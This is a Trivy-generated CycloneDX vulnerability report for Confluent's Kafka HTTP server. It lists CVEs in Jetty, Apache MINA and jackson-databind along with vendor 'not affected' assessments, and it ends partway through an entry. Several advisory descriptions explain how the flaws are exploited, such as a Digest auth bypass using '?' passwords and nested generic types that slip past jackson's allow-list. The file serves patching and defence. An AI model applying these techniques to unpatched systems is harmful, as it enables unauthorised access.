{
  "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json",
  "bomFormat": "CycloneDX",
  "specVersion": "1.6",
  "serialNumber": "urn:uuid:cae11ed2-8966-4da7-b198-79f34351e830",
  "version": 1,
  "metadata": {
    "timestamp": "2026-08-20T01:18:46+00:00",
    "tools": {
      "components": [
        {
          "type": "application",
          "manufacturer": {
            "name": "Aqua Security Software Ltd."
          },
          "group": "aquasecurity",
          "name": "trivy",
          "version": "0.69.3"
        }
      ]
    },
    "component": {
      "bom-ref": "73a030d6-2863-42c2-9279-5e4d7158a240",
      "type": "application",
      "supplier": {
        "name": "Confluent"
      },
      "name": "confluent-ce-kafka-http-server",
      "version": "7.5.16-1",
      "properties": [
        {
          "name": "aquasecurity:trivy:SchemaVersion",
          "value": "2"
        }
      ]
    }
  },
  "components": [],
  "dependencies": [],
  "vulnerabilities": [
    {
      "id": "CVE-2024-6763",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 3.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1286
      ],
      "description": "Eclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine . It includes a utility class, HttpURI, for URI/URL parsing.\n\nThe HttpURI class does insufficient validation on the authority segment of a URI.  However the behaviour of HttpURI\n differs from the common browsers in how it handles a URI that would be \nconsidered invalid if fully validated against the RRC.  Specifically HttpURI\n and the browser may differ on the value of the host extracted from an \ninvalid URI and thus a combination of Jetty and a vulnerable browser may\n be vulnerable to a open redirect attack or to a SSRF attack if the URI \nis used after passing validation checks.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-http to version 12.0.12",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-6763"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-6763"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/12012"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-qh8g-58pp-2wxh"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/25"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6763"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0005/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
        }
      ],
      "published": "2024-10-14T16:15:04+00:00",
      "updated": "2026-06-17T08:18:39+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@9.4.61",
          "versions": [
            {
              "version": "9.4.61",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@9.4.63",
          "versions": [
            {
              "version": "9.4.63",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@9.4.60",
          "versions": [
            {
              "version": "9.4.60",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:0bff854c-463d-426b-b9ed-2e6b564da7b9/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#3e5aa17a-6372-40d3-a18d-841fc09b0e51"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9be5b862-8e55-4839-b310-27005fb4adaf"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c33fd051-16a1-4601-b409-1704b7df2b4e"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#287709fa-55c3-4a3f-a62c-a958147ba957"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#95175c83-fe79-43f3-b3d2-e8948a11f2b7"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#e55e1d03-2f9d-4420-aea0-280faa563aa2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#da16f6f9-fabd-4167-93c2-983241af0c9c"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#f6c357d7-d572-4ad0-9b9e-b9d3c761a808"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#dac8924f-7ca9-4caa-a617-34feb0cf43fa"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d14d9262-93fc-4b73-8456-deb2bc3d4cd2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#e4bc5f1e-781d-41bb-8ffe-7655f7252e28"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e1848061-570b-4f1d-a6f9-ef81ff1f30e8"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#732ca888-e797-43d6-9fc9-9748d1a49053"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#d8690b64-e0bd-468d-a1b7-638b6f965a21"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This vulnerability is not exploitable in the context of Confluent Platform as URIs are not used to pass sensitive information. "
      }
    },
    {
      "id": "CVE-2026-10050",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 9.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        173,
        303
      ],
      "description": "In Eclipse Jetty, the Digest authentication server-side component uses ISO-8859-1 to encode the password as bytes.\n\n\n\nThis was done because the initial specification for HTTP did not specify explicitly a charset, and it was assumed to be ISO-8859-1 for historical reasons.\n\n\n\nIf the password contains characters that cannot be represented in ISO-8859-1, they are silently replaced by `?`. This happens with passwords that contain Chinese, Cyrillic or Greek characters, for example: `\u03b1\u03b2123` converts to `??123`.\n\n\n\nAn attacker can send a request with a digest `Authorization` header crafted with a password made of only `?` characters; the server would match any password of the same length that contains non-ISO-8859-1 characters.\n\n\n\nRecent HTTP Digest [RFC-7616](https://datatracker.ietf.org/doc/html/rfc7616) supports a `charset` parameters that defaults to UTF-8 that allows for correct encoding/decoding of passwords.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-security to version 9.4.63, 10.0.31, 11.0.31, 12.0.36, 12.1.10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-10050"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-10050"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/4bcdbc7db387ce9e20e2c7571a7250280466221d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/d0bb829ccecbf19e3ad3d32f2649b2800f01222d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/issues/15136"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15160"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15183"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.36"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.10"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-2fvj-hgj9-j2gr"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/120"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10050"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10050"
        }
      ],
      "published": "2026-08-04T11:22:43+00:00",
      "updated": "2026-08-08T00:38:56+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@9.4.61",
          "versions": [
            {
              "version": "9.4.61",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@9.4.60",
          "versions": [
            {
              "version": "9.4.60",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#860f5c47-9d53-4fe2-8540-ce5e098e75e1"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#f2a8ca4d-d350-4d0e-bc7d-7075f0604238"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ddcd4d2f-5ffc-4c22-833b-c6c9d7161dea"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#ebf0cd13-9a0f-4168-a790-5b221f09f446"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#7874a5b3-919c-4241-bbd1-ddf805dbb486"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#e2134126-274a-46f5-b26c-9be18e7a005e"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f943bbec-e7e6-4877-a66e-d790362587d8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#d8cce52c-c7c9-409e-9613-ad33f00f597f"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#fc846740-3c31-4443-8600-66dae125b49e"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#f72d8507-5757-4e17-8334-e67738ed1b63"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#bb7e27cb-d455-41ee-bcb5-7df1d212cb18"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#fb6eec77-4ed0-48ab-8257-28ad949d2b71"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#dd301c26-f4fa-4cd2-af81-13069cd46bff"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#79bedbc2-b9f0-44f8-8e33-d9716aa747dc"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#f07f1966-1bc9-4d82-92b0-fa86fcf2e2b1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-47065",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 9.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        502
      ],
      "description": "ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via java.lang.reflect.Proxy\n\n\nAssessment: Fully addressed.\n\n\nWhen the serialised stream contains a TC_PROXYCLASSDESC (the marker \nfor a java.lang.reflect.Proxy ), JDK\u2019s ObjectInputStream.readProxyDesc()\n is\ndispatched. JDK then calls the default \nObjectInputStream.resolveProxyClass(interfaces) implementation, which \nperforms Class.forName(intf, false, latestUserDefinedLoader()) for EACH \ninterface name and constructs the proxy class \u00e2\u20ac\u201d bypassing the accepted\n classes list .\n\n\nZDRES-233: Class.forName(name, initialize=true, classLoader) in \nreadClassDescriptor Triggers Static Initialiser of Allow-Listed Classes\n\n\nAssessment: Fully addressed.\n\n\nFor ANY class on the allow-list, deserialising a stream that names it triggers the class\u2019s \n (static initialiser) BEFORE any instance is constructed. This means an \nattacker who supplies a class name on the allow-list (e.g., the \ndeveloper wrote accept(\u201ccom.myapp.*\") , attacker supplies \ncom.myapp.SomeClass ) causes <clinit> of SomeClass \u00e2\u20ac\u201d and many \nreal-world classes have side-effecting static initialisers\n\n\nBoth issues have been fixed.",
      "recommendation": "Upgrade org.apache.mina:mina-core to version 2.2.8, 2.1.13, 2.0.29",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-47065"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-47065"
        },
        {
          "url": "https://github.com/apache/mina"
        },
        {
          "url": "https://lists.apache.org/thread/y7xj1bl8qo47p9bktb11hg5v6k1d4dyj"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47065"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47065"
        }
      ],
      "published": "2026-06-03T11:16:19+00:00",
      "updated": "2026-07-22T19:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.mina/mina-core@2.2.7",
          "versions": [
            {
              "version": "2.2.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.mina/mina-core@2.0.28",
          "versions": [
            {
              "version": "2.0.28",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#fbf7e330-462f-4806-be87-2b9ce8dec3e1"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9a334c14-bd84-4571-ae42-5fe7439e9ca5"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#6885ad72-8df1-4d50-bb49-ce70fb3cc950"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#ec7b811f-0951-4fbe-ac61-2c7bca209fb8"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#253bf9bc-4fb9-4eb8-88c7-6e992fabeb85"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#e1d4ed6f-ca0c-47c6-bde1-d12c873c42ec"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#c58ff060-36e5-43b6-b4e4-943dad02b444"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dbc1779c-0d77-41c3-b586-a3897c302cab"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#fcecd137-277b-4f74-a29b-f9a6f9fe206f"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#e840aa12-233c-4eae-babf-305ce51aad77"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#bcb5dd4a-94b8-4660-a9f4-2ddf05b94dee"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#f4585247-3f07-4ec8-a75f-ddb703c066f7"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#f485fbb7-4ed3-43a1-8f0d-90ff60151f1c"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#c7403617-fcff-4e31-baa4-d1a51cd245ed"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The affected component (org.apache.mina:mina-core) is reachable only as Kerberos test-only tooling never shipped in the runtime, or as an unused transitive dependency of the REST framework's optional LDAP-JAAS module which never invokes mina's deserialization API."
      }
    },
    {
      "id": "CVE-2026-54512",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184,
        502
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, jackson-databind's PolymorphicTypeValidator (PTV) is the primary safety mechanism guarding polymorphic deserialization. When polymorphic typing is enabled and a type identifier contains generic parameters (i.e. the type ID string contains <), DatabindContext._resolveAndValidateGeneric() validates only the raw container class name (the substring before <) against the configured PTV. If the container type is approved, the method parses the full canonical type string via TypeFactory.constructFromCanonical() and returns the fully parameterized type without ever validating the nested type arguments against the PTV. The nested type arguments are then resolved, instantiated, and populated as beans during deserialization. An attacker who controls the type ID can therefore place a denied class as a generic type parameter of an allowed container \u2014 for example java.util.ArrayList<com.evil.Gadget> when only java.util.ArrayList is allow-listed. The container passes the PTV check; com.evil.Gadget is loaded via Class.forName(name, true, loader), instantiated, and its properties are set from attacker-controlled JSON. This completely bypasses an explicitly configured PTV allow-list. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 3.1.4, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54512"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492015"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54512"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-43400.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:40895"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/434d6c511de7fdd9872f29157aafb6162d12d8d5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5988"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-j3rv-43j4-c7qm"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54512.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54512"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54512"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T21:01:36+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#69bb2bc0-1cdc-41bb-94df-6c5233916d74"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#9fb00781-15ac-441a-8c36-f84d7e0f38e8"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
